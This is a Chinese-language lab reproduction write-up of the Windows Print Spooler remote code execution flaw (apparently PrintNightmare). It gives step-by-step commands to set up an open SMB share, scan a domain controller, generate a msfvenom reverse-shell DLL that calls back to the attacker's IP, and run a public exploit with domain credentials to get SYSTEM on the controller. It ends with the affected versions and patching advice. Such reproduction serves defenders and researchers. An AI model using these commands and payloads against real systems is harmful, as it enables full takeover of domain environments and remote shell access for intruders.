Windows Print Spooler CVE--1675 漏洞复现
Created: July 7, 5:25 PM
漏洞描述
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
利用条件
域环境 域内用户 开启Spooler打印功能
复现环境
域控:Windows server IP:192.168.10.10
攻击机:Kali IP:192.168.10.2
漏洞利用
0X01.添加域控的普通账号。
0X02.由于Kali中impacket版本过低需安装更高版本的impacket网络协议工具包
> sudo pip3 uninstall impacketgit clone [/cube0x0/impacket](/cube0x0/impacket)cd impacketsudo python3 ./setup.py install
0X03.攻击机需开启SMB服务并创建共享目录tmp,以便上传木马至域控中
在Kali中编辑 ”/etc/samba/smb.conf" ,修改以下配置
> [global]workgroup = WORKGROUPlog file = /var/log/samba/log.%mmax log size = 1000security = userserver role = standalone servermap to guest = bad userusershare allow guests = yes[smb]comment = Sambabrowseable = yeswriteable = yespublic = yespath = /tmp/read only = noguest ok = yes
重启SMB服务
> systemctl restart smbd.service
测试Kali上的SMB服务能否访问
0X04.通过impacket中的rpcdump.py扫描目标机是否存在漏洞
> python3 rpcdump.py @192.168.10.10 | grep MS-RPRN
如图所示,工具扫描结果显示服务器经过扫描存在漏洞
0X05.在共享目录tmp下通过msfvenom生成.dll文件木马
> msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.2 lport=9999 -f dll -o reverse.dll
0X06.通过MSF中的"exploit/multi/handler"监听模块,建立监听
0X07.通过使用EXP进行利用
> EXP:[/cube0x0/CVE--1675](/cube0x0/CVE--1675)
> python3 CVE--1675.py vu1n:Passw0rd@192.168.10.10 '\\192.168.10.2\smb\reverse.dll'
0X08.成功反弹shell并获取到域控system权限,利用成功。
0X09.在受害机中可以通过"Process Hacker"查看相关的进程
0X10.利用成功之后spooler服务会自动关闭。
影响范围
> Windows Server R2 (Server Core installation)Windows Server R2Windows Server (Server Core installation)Windows Server Windows Server R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server R2 for x64-based Systems Service Pack 1Windows Server for x64-based Systems Service Pack 2 (Server Core installation)Windows Server for x64-based Systems Service Pack 2Windows Server for 32-bit Systems Service Pack 2 (Server Core installation)Windows Server for 32-bit Systems Service Pack 2Windows RT 8.1Windows 8.1 for x64-based systemsWindows 8.1 for 32-bit systemsWindows 7 for x64-based Systems Service Pack 1Windows 7 for 32-bit Systems Service Pack 1Windows Server (Server Core installation)Windows Server Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server, version (Server Core installation)Windows 10 Version for x64-based SystemsWindows 10 Version for ARM64-based SystemsWindows 10 Version for 32-bit SystemsWindows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows Server (Server Core installation)Windows Server Windows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems
安全建议
安装微软CVE--1675漏洞补丁
/update-guide/vulnerability/CVE--1675
在服务应用(services.msc)中找到Print Spooler服务,将“启动类型”修改为“禁用”
参考
9.利用msfvenom生成木马
MSFvenom | Offensive Security
cube0x0/CVE--1675
CVE--1675 Windows Spooler Service RCE